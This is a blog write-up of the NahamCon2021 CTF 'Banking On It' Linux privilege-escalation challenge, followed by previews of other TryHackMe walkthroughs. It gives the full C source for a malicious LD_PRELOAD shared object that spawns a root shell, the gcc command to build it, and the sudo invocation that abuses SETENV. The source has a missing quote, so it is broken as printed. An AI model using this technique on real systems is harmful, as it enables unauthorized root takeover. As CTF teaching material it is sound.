Nahamcon2021 CTF - Banking On It - Writeup

Introduction

Today we're doing a CTF writeup for the Banking On It challenge from the NahamCon2021 CTF. Banking On It is a Linux PrivEsc challenge, and after we start the challenge we received a string we can use to interact with the challenge:


First, we login to the server as the gus user, using an SSH private key captured from a previous challenge:

ssh -i guskey.txt -p 31608 gus@challenge.nahamcon.com


First, let's see if our user has any special sudo privileges:

sudo -l


Our user can run the SETENV command as root without a password when using the bank program in the /opt/banking/ directory. That means that if we're able to create a malicious shared object (.so) file, we can use the SETENV LD_PRELOAD command to activate the malicious .so file and elevate our privileges.

First, let's see if there's a compiler on the system we can use to compile our .so file.

which gcc


That being confirmed, we move to a publicly writable directory and create our malicious file's precompiled code:

cd /tmp
vim malicious.c
i (this switches the vim text editor to input mode)


We used this article as a guide for creating the contents of our file:

https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/

Inside the editor:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
unsetenv("LD_PRELOAD);
setgid(0);
setuid(0);
system("/bin/sh");
}


Then save and exit the vim editor by pressing the Esc key, then:
:wq

Make sure to manually type in the code, because pasting code into vim can result in some strange interpretation.

Now we're ready to compile our exploit file:

gcc -fPIC -shared -o malicious.so malicious.c -nostartfiles


The .so file compiled with a few warnings, but it came out nonetheless. Finally, we call the malicious .so file with the bank binary. If successful, the LD_PRELOAD will take effect and we will open a new shell as root:

sudo LD_PRELOAD=/tmp/malicious.so /opt/banking/bank


We are now root.  Let's capture the flag file:

cat /root/flag.txt


Summary

Upon enumerating the system environment, we found that our user had SETENV privileges as root when executing a particular binary. We were then able to create a malicious library file, which we included when executing the SETENV enabled binary, which created a new shell for us with root access. Using this access, we were able to access our objective flag file.

Finish




Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more